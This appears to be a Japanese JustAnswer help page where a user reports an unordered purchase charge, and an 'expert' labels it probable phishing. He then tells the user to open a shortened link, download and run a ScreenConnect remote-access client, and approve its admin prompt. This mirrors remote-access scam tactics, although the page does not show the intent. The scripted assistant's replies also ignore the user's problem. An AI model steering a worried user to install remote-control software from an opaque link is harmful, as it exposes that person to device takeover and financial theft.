ジャストアンサーのしくみ:
  • 専門家に質問
    知識豊富な専門家があらゆる質問にお答えするために常に待機しています。
  • 専門家が丁寧に対応
    E メールやサイト内オンラインメッセージなど、さまざまな手段で回答を通知。必要に応じてフォローアップの質問をすることもできます。
  • やり取り回数、制限なし
    専門家からの回答を確認し評価をすることで、支払うかどうかを決めます。
masatechに今すぐ質問する
masatech
masatech, ITエンジニア
カテゴリ: IT・インターネット
満足したユーザー: 6876
経験:  1997年よりプログラマーとして、数多くのシステムを設計、開発する
106650192
ここに IT・インターネット に関する質問を入力してください。
masatechがオンラインで質問受付中

今注文していないていない アシスタント:

解決済みの質問:

今注文していないていない
アシスタント: 了解しました。お使いの端末、そしてお使いのオペレーティングシステム(OS)を教えていただけますか?
質問者様: 今、注文していない請求がメールで届きました。
アシスタント: 了解しました。何かエラーは表示されていますか?その場合、そちらを教えていただけますか?
質問者様: エラーはわかりませんが、24日に知らない住所に届くようになってます。請求金額はわたしのクレジットカードに落ちるようです。
アシスタント: 再起動など、ご自身で何か試みられたことはありますか?
質問者様: してません
投稿: 19 日 前.
カテゴリ: IT・インターネット
専門家:  masatech 返答済み 19 日 前.

はじめまして。

担当させていただきます。よろしくお願いします。

Amazonからそのようなメールが届いたということでしょうか?

フィッシングメールの可能性が高いので送信元のメールアドレスを教えてください。

masatechをはじめその他名のIT・インターネットカテゴリの専門家が質問受付中
質問者: 返答済み 19 日 前.
Amazon<*****@******.***
専門家:  masatech 返答済み 19 日 前.

準備ができましたら、以下の操作を行ってください。

1.「https://x.gd/7z3MS」にアクセスしてください。

2.画面中央にある「同意する」をクリックしてください。

3.「Elsinore.ScreenConnect.Client.exe」というファイルがダウンロードされますので実行してください。

4.画面に、「このアプリがデバイスに変更を加えることを許可しますか?」が出たら、「はい」を押してください。

※上記操作はスマホからではなく該当のPCで行ってください。

IT・インターネット についての関連する質問